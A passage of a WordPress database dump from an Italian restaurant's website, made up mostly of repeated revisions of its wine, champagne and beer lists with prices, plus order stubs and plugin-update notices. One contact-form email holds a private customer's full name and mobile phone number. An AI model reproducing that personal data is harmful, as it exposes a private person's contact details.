style=\"text-align: center\">   <em><strong><u>Veneto</u></strong></em></p>\r\n<p style=\"text-align: left\">    Campofalco Biologico          Prosecco Valdobbiadene D.OC.G                                                          € 19</p>\r\n<p style=\"text-align: left\">    Adami                                      Prosecco Valdob. D.O.C.G. Brut Bosco di Giga                                 €20</p>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Le mille e una bollicina','','inherit','closed','closed','','75-revision-v1','','','2020-09-26 21:30:13','2020-09-26 19:30:13','',75,'https://www.ristorantesolymar.it/2020/09/26/75-revision-v1/',0,'revision','',0),(1103,2,'2020-10-24 23:07:55','2020-10-24 21:07:55','<p style=\"text-align: center\"><strong>BOLLICINE</strong></p>\n<p style=\"text-align: center\"><strong> </strong><strong><u>Italia</u></strong><u></u></p>\n<strong><u>     Toscana</u></strong>\n\nTunia                             Sottofondo I.G.T. Toscana Bianco frizzante                                € 21,00\n\n&nbsp;\n\n<strong><u>     Marche</u></strong>\n\nMarotti Campi               Brut Rosè                                                                                           € 20,00\n\nLa Staffa                         Mai sentito Igt Marche Frizzante sur le lie                                    € 20,00\n\n&nbsp;\n\n<strong><u>   Campania </u></strong>\n\n<strong><u>  </u></strong>\n\nCiro Picariello                   Spumante metodo classico Brut Contadino                                      € 27,00\n\n&nbsp;\n\n&nbsp;','Le mille e una bollicina','','inherit','closed','closed','','71-autosave-v1','','','2020-10-24 23:07:55','2020-10-24 21:07:55','',71,'https://www.ristorantesolymar.it/2020/09/26/71-autosave-v1/',0,'revision','',0),(1104,2,'2020-09-26 21:40:49','2020-09-26 19:40:49','<p style=\"text-align: center\">BOLLICINE  ITALIA</p>\r\n<p style=\"text-align: center\"><em><strong><u>Emilia Romagna</u></strong></em></p>\r\nPodere il Saliceto       Ringadora Brut Nature Metodo classico (lambrusco)       (NO)              € 24,00\r\n\r\nBon Luigi                     Belmount Pas dosè                                                                    (NO)              € 27,00\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><em><strong><u>Toscana</u></strong></em></p>\r\nTunia                             Sottofondo I.G.T. Toscana Bianco frizzante                                                € 21,00\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><em><strong><u>Marche</u></strong></em></p>\r\nMarotti Campi             Brut Rosè                                                                                                             € 17,00\r\n\r\nCollestefano                 Verdicchio di matelica Extra Brut                                           (NO)              € 22,00\r\n\r\nValturio                         1759 Extra Brut Rose                                                                  (NO)             € 29,00\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong><u><em>Campania</em> </u></strong></p>\r\n<p style=\"text-align: left\">Ciro Picariello         Spumante metodo classico Brut Contadino                                                       € 27,00</p>\r\n&nbsp;','Le mille e una bollicina','','inherit','closed','closed','','71-revision-v1','','','2020-09-26 21:40:49','2020-09-26 19:40:49','',71,'https://www.ristorantesolymar.it/2020/09/26/71-revision-v1/',0,'revision','',0),(1105,2,'2020-09-26 22:08:51','2020-09-26 20:08:51','<p style=\"text-align: center\"><em><strong><u>Franciacorta</u></strong></em></p>\r\n<p style=\"text-align: left\">Faccoli                       Brut D.O.C.G                                                                    € 30,00</p>\r\n<p style=\"text-align: left\">Majolini<strong>                     </strong>Satèn millesimato D.O.C.G                                           €30,00</p>\r\n<p style=\"text-align: left\">Monterossa                P.R. Brut blanc de blancs                   (NO)                  €32,00</p>\r\n<p style=\"text-align: left\">                                     Cabochon Brut millesimo                                              €65,00</p>\r\n<p style=\"text-align: left\">Il Mosnel                    Extra Brut millesimato D.O.C.G                                  € 38,00</p>\r\n<p style=\"text-align: left\">                                     Pas dosè D.O.C.G                                                             € 27,00</p>\r\n<p style=\"text-align: left\">Villa                             Brut rosé millesimato D.O.C.G                                     € 32,00</p>\r\n<p style=\"text-align: left\">                                      Saten millesimato D.O.C.G                                           € 30,00</p>\r\n&nbsp;\r\n<p style=\"text-align: center\"><em><strong><u>Sud Africa</u></strong></em></p>\r\nPongracz                    Metodo classico brut da chardonnay e pinot nero     € 25,00','Franciacorta','','inherit','closed','closed','','77-revision-v1','','','2020-09-26 22:08:51','2020-09-26 20:08:51','',77,'https://www.ristorantesolymar.it/2020/09/26/77-revision-v1/',0,'revision','',0),(1106,2,'2020-09-26 22:16:29','2020-09-26 20:16:29','<p style=\"text-align: center\"><em><strong><u>I Blanc de Blancs</u></strong></em></p>\r\nAgrapart &amp; fils                            Terroirs Ex. Brut Grand Cru Avize                                    € 80,00\r\n\r\nUlysse Collin                               Les Pierrieres Extra Brut rm Congy                                  € 90,00\r\n\r\nPascal Doquet                             Brut   Diapason     Mesnil sur Oger                                   € 62,00\r\n\r\nBrut grand cru  Mesnil sur Oger                                        € 85,00\r\n\r\nBonnet Gilmert                           Cuvee de reserve Brut Grand Cru Oger                            € 45,00\r\n\r\nPierre Gimonnet                         Cuvee 1er cru brut Cuis                                                        € 42,00\r\n\r\nDavid Léclapart                           L’artiste pas dose 1er cru (biod.) Trépail                         € 105,00\r\n\r\nR &amp; L Legras                                Brut Grand Crù Chouilly                                                      € 50,00\r\n\r\nSaint Vincent Grand cru Mill Chouilly                             € 120,00\r\n\r\nDiebolt Vallois                             Brut Mill   Cramant                           “11                              € 60,00\r\n\r\nFleur de Passion Brut Cramant         “07                          € 120,00\r\n\r\nVouette &amp; Sorbée                        Blanc d’Argile Extra Brut Buxieres sur Arce                   € 80,00','Francia Champagne','','inherit','closed','closed','','79-revision-v1','','','2020-09-26 22:16:29','2020-09-26 20:16:29','',79,'https://www.ristorantesolymar.it/2020/09/26/79-revision-v1/',0,'revision','',0),(1107,2,'2020-09-26 22:53:01','2020-09-26 20:53:01','<p style=\"text-align: center\"><em><strong>  <u><span style=\"color: #47425d\">Assemblaggi</span></u></strong></em></p>\n<strong> </strong>Philipponnat                  Royale Reserve non dose Mareuil-sur-Ay                 (NO)                      € 55,00\n\nMoet et Chandon           Dom Perignon Vintage Epernay                          (NO)                            € 200,00\n\nKrug                                  Grande Cuveè                                                                  (NO)                     € 190,00\n\nMarguet                            Shaman 14 Grand Cru (biodinamico)                        (NO)                     € 65,00\n\nPierre Gerbais                 Grains de Celle Extra Brut                                                                          € 45,00\n\nJean Paul Deville            Carte Noir Brut Verzy                                                                                  € 39,00\n\n&nbsp;\n<p style=\"text-align: center\"><strong><em><u>Rosè</u></em></strong></p>\nLamiable                            Brut rosé grand cru                                                                                      € 50,00\n\nPascal Doquet                   Brut 1°ers cru Mesnil sur Oger                                                                  € 6,00\n\nLaurent-Perrier                Cuvée Rosé Tours Sur Marne                                                                     € 70,00\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;','Assemblaggi','','inherit','closed','closed','','81-autosave-v1','','','2020-09-26 22:53:01','2020-09-26 20:53:01','',81,'https://www.ristorantesolymar.it/2020/09/26/81-autosave-v1/',0,'revision','',0),(1108,2,'2020-09-26 22:29:18','2020-09-26 20:29:18','<p style=\"text-align: center\"><em><strong>  <u><span style=\"color: #47425d\">Assemblaggi</span></u></strong></em></p>\r\n<strong> </strong>Philipponnat                  Royale Reserve non dose Mareuil-sur-Ay                 (NO)                      € 55,00\r\n\r\nMoet et Chandon           Dom Perignon Vintage Epernay                     “06      (NO)                     € 150,00\r\n\r\nKrug                                  Grande Cuveè                                                                  (NO)                     € 160,00\r\n\r\nMarguet                            Shaman 14 Grand Cru (biodinamico)                        (NO)                     € 58,00\r\n\r\nPierre Gerbais                 Grains de Celle Extra Brut                                                                          € 45,00\r\n\r\nJean Paul Deville            Carte Noir Brut Verzy                                                                                  € 39,00\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong><em><u>Rosè</u></em></strong></p>\r\nLamiable                            Brut rosé grand cru                                                                                      € 47,00\r\n\r\nPascal Doquet                   Brut 1°ers cru Mesnil sur Oger                                                                  € 62,00\r\n\r\nLaurent-Perrier                Cuvée Rosé Tours Sur Marne                                                                     € 70,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Assemblaggi','','inherit','closed','closed','','81-revision-v1','','','2020-09-26 22:29:18','2020-09-26 20:29:18','',81,'https://www.ristorantesolymar.it/2020/09/26/81-revision-v1/',0,'revision','',0),(1110,2,'2020-09-26 22:41:42','2020-09-26 20:41:42','<p style=\"text-align: center\"><strong><u><span style=\"color: #47425d\">I</span></u><em><u><span style=\"color: #47425d\"> Blanc de Noir</span></u></em></strong></p>\r\nBereche et fils                     Rive Gauche ext. Brut 100% meunier Mareuil-le-port                   € 75,00\r\n\r\nNathalie Falmet                 Le Val Cornet brut Rouvres les Vignes                                               € 60,00\r\n\r\nFleury Pere &amp; Fils              Brut nm (biologico) Courteron                                                            € 50,00\r\n\r\nEgly-Ouriet                         “Les Vignes de Vrigny”Brut 1er cru (100%meunier)rm                  € 60,00\r\n\r\nUlysse Collin                        Les Maillon Extra Brut rm Congy                                                       € 100,00\r\n\r\nAlain Couvrer                       Brut Propriétaire récoltante à Prouillly                                            €45,00','I blanc de noir','','publish','closed','closed','','francia-champagne-2','','','2020-09-26 22:45:47','2020-09-26 20:45:47','',22,'https://www.ristorantesolymar.it/?page_id=1110',9,'page','',0),(1112,2,'2020-09-26 22:41:42','2020-09-26 20:41:42','<p style=\"text-align: center\"><strong><u><span style=\"color: #47425d\">I</span></u><em><u><span style=\"color: #47425d\"> Blanc de Noir</span></u></em></strong></p>\r\nBereche et fils                     Rive Gauche ext. Brut 100% meunier Mareuil-le-port                   € 75,00\r\n\r\nNathalie Falmet                 Le Val Cornet brut Rouvres les Vignes                                               € 60,00\r\n\r\nFleury Pere &amp; Fils              Brut nm (biologico) Courteron                                                            € 50,00\r\n\r\nEgly-Ouriet                         “Les Vignes de Vrigny”Brut 1er cru (100%meunier)rm                  € 60,00\r\n\r\nUlysse Collin                        Les Maillon Extra Brut rm Congy                                                       € 100,00\r\n\r\nAlain Couvrer                       Brut Propriétaire récoltante à Prouillly                                            €45,00','Francia Champagne','','inherit','closed','closed','','1110-revision-v1','','','2020-09-26 22:41:42','2020-09-26 20:41:42','',1110,'https://www.ristorantesolymar.it/2020/09/26/1110-revision-v1/',0,'revision','',0),(1113,2,'2020-09-26 22:42:22','2020-09-26 20:42:22','<p style=\"text-align: center\"><strong><u><span style=\"color: #47425d\">I</span></u><em><u><span style=\"color: #47425d\"> Blanc de Noir</span></u></em></strong></p>\r\nBereche et fils                     Rive Gauche ext. Brut 100% meunier Mareuil-le-port                   € 75,00\r\n\r\nNathalie Falmet                 Le Val Cornet brut Rouvres les Vignes                                               € 60,00\r\n\r\nFleury Pere &amp; Fils              Brut nm (biologico) Courteron                                                            € 50,00\r\n\r\nEgly-Ouriet                         “Les Vignes de Vrigny”Brut 1er cru (100%meunier)rm                  € 60,00\r\n\r\nUlysse Collin                        Les Maillon Extra Brut rm Congy                                                       € 100,00\r\n\r\nAlain Couvrer                       Brut Propriétaire récoltante à Prouillly                                            €45,00','I blanc de noir','','inherit','closed','closed','','1110-revision-v1','','','2020-09-26 22:42:22','2020-09-26 20:42:22','',1110,'https://www.ristorantesolymar.it/2020/09/26/1110-revision-v1/',0,'revision','',0),(1116,2,'2020-09-26 22:53:26','2020-09-26 20:53:26','<p style=\"text-align: center\"><em><strong>  <u><span style=\"color: #47425d\">Assemblaggi</span></u></strong></em></p>\r\n<strong> </strong>Philipponnat                  Royale Reserve non dose Mareuil-sur-Ay                 (NO)                      € 55,00\r\n\r\nMoet et Chandon           Dom Perignon Vintage Epernay                          (NO)                            € 200,00\r\n\r\nKrug                                  Grande Cuveè                                                                  (NO)                     € 190,00\r\n\r\nMarguet                            Shaman 14 Grand Cru (biodinamico)                        (NO)                     € 65,00\r\n\r\nPierre Gerbais                 Grains de Celle Extra Brut                                                                          € 45,00\r\n\r\nJean Paul Deville            Carte Noir Brut Verzy                                                                                  € 40,00\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong><em><u>Rosè</u></em></strong></p>\r\nLamiable                            Brut rosé grand cru                                                                                      € 50,00\r\n\r\nPascal Doquet                   Brut 1°ers cru Mesnil sur Oger                                                                  € 62,00\r\n\r\nLaurent-Perrier                Cuvée Rosé Tours Sur Marne                                                                     € 70,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Assemblaggi','','inherit','closed','closed','','81-revision-v1','','','2020-09-26 22:53:26','2020-09-26 20:53:26','',81,'https://www.ristorantesolymar.it/2020/09/26/81-revision-v1/',0,'revision','',0),(1117,2,'2020-09-26 23:02:20','2020-09-26 21:02:20','<p style=\"text-align: center\"><strong><em><u>Assemblaggi</u></em></strong></p>\nAgrapart &amp; fils              7 crus Brut     Avize                                                                      € 70,00\n\nL.Aubry Fils                  Aubry 1er cru. Brut rm Jouy-les-Reims                                   € 50,00\n\nCuvée de Humbert P.C. Brut “ Jouy-les-Reims                     € 70,00\n\nBereche et fils               Brut reserve Craon de Ludes                                                      € 50,00\n\nReflet d’Antan Brut Craon de Ludes                                         €90,00\n\nEmmanuel Brochet     Le Mont Benoit Extra Brut Ville-aux-Noeuds                        € 70,00\n\nRoger Brun                  Brut Reserve à Ay                                                                          € 42,00\n\nCorbon\n\nLaherte Frères             Ultradition Brut Epernay   0,375 ml                                         € 25,00\n\nUltradition Brut Epernay   0,750 ml                                         € 50,00\n\nJaquesson &amp;fils           Cuvee Brut Dizy 743                                                                      € 63,00\n\nBenoït Lahaye              Brut Naturessense rm     Bouzy                                                   € 65,00\n\nViolaine (senza solforosa aggiunta) Bouzy                               € 90,00\n\n&nbsp;\n\nGeorges Laval             Garennes 1er cru Cumieres                                           € 68,00\n\n&nbsp;\n\nMarie-Noelle Ledru        Brut Grand.Cru Ambonnay                                               € 63,00\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\nEgly-Ouriet                                Brut Tradition Grand Cru rm Ambonnay                         € 90,00\n\n&nbsp;\n\n&nbsp;\n\nFranck Pascal               Reliance Brut nature (biologico,biodinamico)\n\nBaslieux                                                                             € 60,00\n\n&nbsp;\n\nLaurent-Perrier            Ultra Brut Nature Tours Sur Marne                                   € 60,00\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;','Assemblaggi','','inherit','closed','closed','','102-autosave-v1','','','2020-09-26 23:02:20','2020-09-26 21:02:20','',102,'https://www.ristorantesolymar.it/2020/09/26/102-autosave-v1/',0,'revision','',0),(1118,2,'2020-09-26 23:03:14','2020-09-26 21:03:14','<p style=\"text-align: center\"><strong><em><u>Assemblaggi</u></em></strong></p>\r\nAgrapart &amp; fils                    7 crus Brut     Avize                                                                      € 70,00\r\n\r\nL.Aubry Fils                        Aubry 1er cru. Brut rm Jouy-les-Reims                                   € 50,00\r\n\r\nCuvée de Humbert P.C. Brut “ Jouy-les-Reims                     € 70,00\r\n\r\nBereche et fils                    Brut reserve Craon de Ludes                                                      € 50,00\r\n\r\nReflet d’Antan Brut Craon de Ludes                                         €90,00\r\n\r\nEmmanuel Brochet           Le Mont Benoit Extra Brut Ville-aux-Noeuds                        € 70,00\r\n\r\nRoger Brun                         Brut Reserve à Ay                                                                          € 42,00\r\n\r\nCorbon\r\n\r\nLaherte Frères                    Ultradition Brut Epernay   0,375 ml                                         € 25,00\r\n\r\nUltradition Brut Epernay   0,750 ml                                         € 50,00\r\n\r\nJaquesson &amp;fils                  Cuvee Brut Dizy 743                                                                      € 63,00\r\n\r\nBenoït Lahaye                     Brut Naturessense rm     Bouzy                                                   € 65,00\r\n\r\nViolaine (senza solforosa aggiunta) Bouzy                               € 90,00\r\n\r\nGeorges Laval                     Garennes 1er cru Cumieres                                                         € 68,00\r\n\r\nMarie-Noelle Ledru           Brut Grand.Cru Ambonnay                                                        € 63,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nEgly-Ouriet                                Brut Tradition Grand Cru rm Ambonnay                         € 90,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nFranck Pascal               Reliance Brut nature (biologico,biodinamico)\r\n\r\nBaslieux                                                                             € 60,00\r\n\r\n&nbsp;\r\n\r\nLaurent-Perrier            Ultra Brut Nature Tours Sur Marne                                   € 60,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Assemblaggi','','inherit','closed','closed','','102-revision-v1','','','2020-09-26 23:03:14','2020-09-26 21:03:14','',102,'https://www.ristorantesolymar.it/2020/09/26/102-revision-v1/',0,'revision','',0),(1120,2,'2020-10-24 23:12:14','2020-10-24 21:12:14','<p style=\"text-align: center\"><u>I VINI BIANCHI ITALIANI</u><u></u></p>\n<strong><u>   Emilia Romagna</u></strong>\n\nAncarani                          Famoso Ravenna I.G.T.   ‘18                                                      € 16,00\n\nTenuta La Palazza          Tornese Chardonnay I.G.T.   ‘18                                            € 20,00\n\nPoderi del Nespoli          Pagadebit di Romagna D.O.C ‘19                                           € 16,00\n\nTre Monti                      Sono Chardonnay senza solfiti I.G.P ‘19                               € 19,00\n\nFattoria Vallona             Ammestesso Pignoletto colli bolognesi D.O.C.                € 21,00\n\n&nbsp;\n\nSan Patrignano              Aulente I.G.T.   ‘19                                                                       € 16,00\n\n<strong><u> </u></strong>\n\n<strong><u> </u></strong>\n\n<strong><u> </u></strong>\n\n<strong><u>   Valle d’Aosta</u></strong>\n\n&nbsp;\n\nLes Cretes                        Chardonnay Cuvèe Bois                                                             € 42,00\n\n&nbsp;\n\nPavese Ermes                 Blanc de Morgex et de la Salle D.O.P.                                 € 22,00\n\n&nbsp;','I vini bianchi italiani','','inherit','closed','closed','','104-autosave-v1','','','2020-10-24 23:12:14','2020-10-24 21:12:14','',104,'https://www.ristorantesolymar.it/2020/09/29/104-autosave-v1/',0,'revision','',0),(1121,2,'2020-09-29 22:34:12','2020-09-29 20:34:12','<p style=\"text-align: center\"><u>I VINI BIANCHI ITALIANI</u></p>\r\n&nbsp;\r\n<p style=\"text-align: center\"><em><strong><u>Emilia Romagna</u></strong></em></p>\r\n   Ancarani                                    Famoso Ravenna I.G.T.                                                 “17   € 15,00\r\n\r\nTenuta La Palazza                    Tornese Chardonnay I.G.T.                                          “17  € 19,00\r\n\r\nPoderi del Nespoli                    Pagadebit di Romagna D.O.C.                                      “17 € 14,00\r\n\r\nTre Monti                                   Sono Chardonnay senza solfiti I.G.P. (NO)                “18 € 17,00\r\n\r\nFattoria Vallona                        Ammestesso Pignoletto colli bolognesi D.O.C.          “10 € 21,00\r\n\r\nSan Patrignano                          Aulente I.G.T.                                                                   “18 € 16,00\r\n\r\n<strong><u> </u></strong>\r\n<p style=\"text-align: center\"><em><strong><u>Valle d’Aosta</u></strong></em></p>\r\n   Les Cretes                                   Chardonnay Cuvèe Bois D.O.C.                                      “15 € 42,00\r\n\r\nPavese                                          Blanc de Morgex et de la Salle D.O.P.                           “16 € 22,00','I vini bianchi italiani','','inherit','closed','closed','','104-revision-v1','','','2020-09-29 22:34:12','2020-09-29 20:34:12','',104,'https://www.ristorantesolymar.it/2020/09/29/104-revision-v1/',0,'revision','',0),(1122,0,'2020-10-18 21:46:03','2020-10-18 19:46:03','Da: Lara Guccini \nTelefono: 3803334875\nOggetto: Regalo coupon per cena 100 euro\n\nCorpo del messaggio:\nHo provato diverse volte all’acquisto di un buono cena ma non mi viene consentito di procedere al pagamento (Explorer, chrome), potete aiutarmi? Potrei fare bonifico? Grazie Lara\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Regalo coupon per cena 100 euro\"','','private','closed','closed','','da-sito-sol-y-mar-regalo-coupon-per-cena-100-euro','','','2020-10-18 21:46:03','2020-10-18 19:46:03','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-regalo-coupon-per-cena-100-euro/',0,'postman_sent_mail','',0),(1124,1,'2020-10-19 13:46:47','2020-10-19 11:46:47','','Order &ndash; Ottobre 19, 2020 @ 01:46 PM','','wc-cancelled','open','closed','wc_order_uuTQjCyONRgjB','ordine-oct-19-2020-1146-am','','','2020-10-19 14:47:03','2020-10-19 12:47:03','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=1124',0,'shop_order','',1),(1125,0,'2020-10-21 14:26:27','2020-10-21 12:26:27','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Contact Form 7 versione 5.3\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar, ristorante a Riccione] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-ristorante-a-riccione-alcuni-plugin-sono-stati-aggiornati-automaticamente','','','2020-10-21 14:26:27','2020-10-21 12:26:27','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-alcuni-plugin-sono-stati-aggiornati-automaticamente/',0,'postman_sent_mail','',0),(1126,0,'2020-10-22 14:33:21','2020-10-22 12:33:21','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Cookie and Consent Solution for the GDPR &amp; ePrivacy versione 2.3.11\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar, ristorante a Riccione] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-ristorante-a-riccione-alcuni-plugin-sono-stati-aggiornati-automaticamente-2','','','2020-10-22 14:33:21','2020-10-22 12:33:21','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-alcuni-plugin-sono-stati-aggiornati-automaticamente-2/',0,'postman_sent_mail','',0),(1127,1,'2020-10-24 08:33:11','2020-10-24 06:33:11','','Order &ndash; Ottobre 24, 2020 @ 08:33 AM','','wc-cancelled','open','closed','wc_order_AZUa21iISPbrz','ordine-oct-24-2020-0633-am','','','2020-10-24 09:31:23','2020-10-24 07:31:23','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=1127',0,'shop_order','',1),(1128,0,'2020-10-24 14:27:04','2020-10-24 12:27:04','Ciao! Alcuni plugin sul tuo sito https://www.ristorantesolymar.it sono stati aggiornati automaticamente all\'ultima versione. Non è richiesta da parte tua alcuna altra operazione.\n\n\nQuesti plugin ora sono aggiornati all\'ultima versione:\n- Smash Balloon Instagram Feed versione 2.5.2\n\n\nSe hai problemi di qualsiasi tipo o hai bisogno di aiuto, i volontari dei forum di supporto su https://it.wordpress.org/forums/ possono riuscire ad aiutarti.\nhttps://it.wordpress.org/support/forums/\n\nIl team di WordPress','[Sol Y Mar, ristorante a Riccione] Alcuni plugin sono stati aggiornati automaticamente','','private','closed','closed','','sol-y-mar-ristorante-a-riccione-alcuni-plugin-sono-stati-aggiornati-automaticamente-3','','','2020-10-24 14:27:04','2020-10-24 12:27:04','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-alcuni-plugin-sono-stati-aggiornati-automaticamente-3/',0,'postman_sent_mail','',0),(1130,2,'2020-10-24 22:53:37','2020-10-24 20:53:37','<p style=\"text-align: center\"><strong><u>LE NOSTRE PROPOSTE AL BICCHIERE</u></strong></p>\r\n<p style=\"text-align: center\"><strong>BIANCHI</strong></p>\r\n<strong> </strong>\r\n\r\nMarotti Campi                      Albiano Verdicchio dei castelli di Jesi Doc 2018             € 4,oo\r\n\r\nLuigi Maffini                           Kratos Fiano D.o.P   ‘16                                                       € 5,oo\r\n\r\nKossler                                  Gewurztraminer   Trentino Alto Adige Doc ‘19                  € 6,oo\r\n\r\nCeretto                                       Blangè                                                                                    € 5,oo\r\n\r\n&nbsp;\r\n\r\nRonco dei Tassi                     Ribolla Gialla (cormons)                                                       € 6,oo\r\n\r\nBachelet Monnot                     Bourgogne Blanc                                                                  € 6,oo\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>BOLLICINE</strong></p>\r\n&nbsp;\r\n\r\nAdami                    Prosecco Superiore D.o.c.g. Valdobbiadene                                      € 7, oo\r\n\r\nMajolini               Saten millesimato D.o.c.g                                                                       € 7, oo\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>ROSSI</strong></p>\r\nFico Grande Romagna Doc               Sangiovese Podere Nespoli                                    € 4,oo\r\n\r\n&nbsp;\r\n<p style=\"text-align: center\"></p>\r\n<p style=\"text-align: center\"><strong>Vino della ” casa “</strong></p>\r\n<strong> </strong>\r\n\r\nMarotti Campi    Albiano Verdicchio Doc dei castelli di Jesi           Bott. 0,750 l           € 15,oo\r\n\r\nVallona              Pignoletto Frizzante D.O.C. Bott. 0,750 l                                                   € 17,oo\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','Vini al bicchiere','','inherit','closed','closed','','106-revision-v1','','','2020-10-24 22:53:37','2020-10-24 20:53:37','',106,'https://www.ristorantesolymar.it/2020/10/24/106-revision-v1/',0,'revision','',0),(1131,2,'2020-10-24 22:58:00','2020-10-24 20:58:00','<u>            SOL Y MAR</u>\r\n\r\n<u> </u>\r\n<p style=\"text-align: center\"><strong><u>I PICCOLI FORMATI DA 0,375 </u></strong></p>\r\n<u> </u>\r\n\r\n<u> </u>\r\n<p style=\"text-align: center\"><strong>Fermi</strong></p>\r\n<strong>                               </strong>\r\n\r\nSan Patrignano             Aulente Bianco                                                                  € 9,00\r\n<p style=\"text-align: center\">Donnafugata                  Anthilia I.G.T.                                                                    € 10,00</p>\r\n<p style=\"text-align: center\">Umani Ronchi               Verdicchio Casal Di Serra                                                € 10,00</p>\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>Bollicine</strong></p>\r\n&nbsp;\r\n<p style=\"text-align: center\">Laherte Freres            Champagne Brut Ultradition   (assemblage)              € 28,00</p>\r\n<p style=\"text-align: center\"> Bonnet Gilmert               Champagne BdB Cuvèe de riserve Brut GC            € 30,00</p>\r\n<p style=\"text-align: center\">  Jean Vesselle                     Champagne Brut Rosè de Saignèe                          € 30,00</p>\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>Rossi</strong></p>\r\n<strong> </strong>\r\n<p style=\"text-align: center\">San Patrignano              Aulente Rosso                                                              € 9,00</p>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;','I piccoli formati da 0.375','','inherit','closed','closed','','73-revision-v1','','','2020-10-24 22:58:00','2020-10-24 20:58:00','',73,'https://www.ristorantesolymar.it/2020/10/24/73-revision-v1/',0,'revision','',0),(1132,2,'2020-10-24 23:01:19','2020-10-24 21:01:19','<u>     SOL Y MAR</u>\r\n<p style=\"text-align: center\"><strong><u>Birre speciali</u></strong></p>\r\n&nbsp;\r\n<p style=\"text-align: center\"><strong>Birra Amarcord</strong></p>\r\n&nbsp;\r\n<p style=\"text-align: left\">       Gradisca              Lager Chiara                                                                                                              €   7,00</p>\r\n<p style=\"text-align: left\">       Midòna                Golden Ale                                                                                                                  €   7,0o</p>\r\n<p style=\"text-align: left\"></p>\r\n<p style=\"text-align: center\"><strong>Ichnusa</strong><strong> </strong></p>\r\n<p style=\"text-align: left\">       Cruda                Chiara (sapore secco e beverino) 0,33 l 4,9%                   (no)                               €  3,00</p>\r\n<p style=\"text-align: left\"></p>\r\n<p style=\"text-align: center\"><strong>32 via dei birrai</strong></p>\r\n<p style=\"text-align: left\">       Curmi al farro  (beverina, rinfrescante, lievemente acidula, di medio corpo) 0,750 l 5,8%       € 11,50</p>\r\n<p style=\"text-align: left\"></p>\r\n<p style=\"text-align: center\"><strong>Birra Perugia</strong></p>\r\n<p style=\"text-align: left\"><strong> </strong></p>\r\n<strong>     </strong> Golden ale       Chiara (beverina,profumi freschi e vivaci) 0,330 l 5,2%                                         €  6,00\r\n\r\nGolden ale         Chiara (beverina,profumi freschi e vivaci) 0,750 l 5,2%                                       € 11,50\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<pre></pre>','Birre','','inherit','closed','closed','','69-revision-v1','','','2020-10-24 23:01:19','2020-10-24 21:01:19','',69,'https://www.ristorantesolymar.it/2020/10/24/69-revision-v1/',0,'revision','',0),(1133,2,'2020-10-24 23:04:03','2020-10-24 21:04:03','<p style=\"text-align: center\"><strong>BOLLICINE</strong></p>\r\n<strong><u> </u></strong>\r\n<p style=\"text-align: center\"><strong><u>Italia</u></strong></p>\r\n<strong><u> </u></strong>\r\n\r\n<strong><u>     Piemonte</u></strong>\r\n<p style=\"text-align: left\">  Ettore Germano                    Alta Langa brut D.O.C.                                                                 € 30</p>\r\n<p style=\"text-align: left\">   Coppo                                    Luigi Coppo Brut                                                                            € 30</p>\r\n&nbsp;\r\n\r\n<strong><u>   Lombardia</u></strong><u></u>\r\n\r\nCantine Montagna             Pinot nero v.i.b. Oltrepò Pavese D.O.C.                                       € 18\r\n\r\n&nbsp;\r\n\r\n<strong><u>   Trentino - Alto Adige</u></strong>\r\n\r\nRevì                                       Trento D.O.C. Dosaggio Zero                                                       € 32\r\n\r\nLetrari (Talento)                   Trento D.O.C. Brut                                                                       € 28\r\n\r\nTrento D.O.C. dosaggio zero                                                       € 35\r\n\r\nFerrari                                      Perlè Trento D.O.C Brut                                                               € 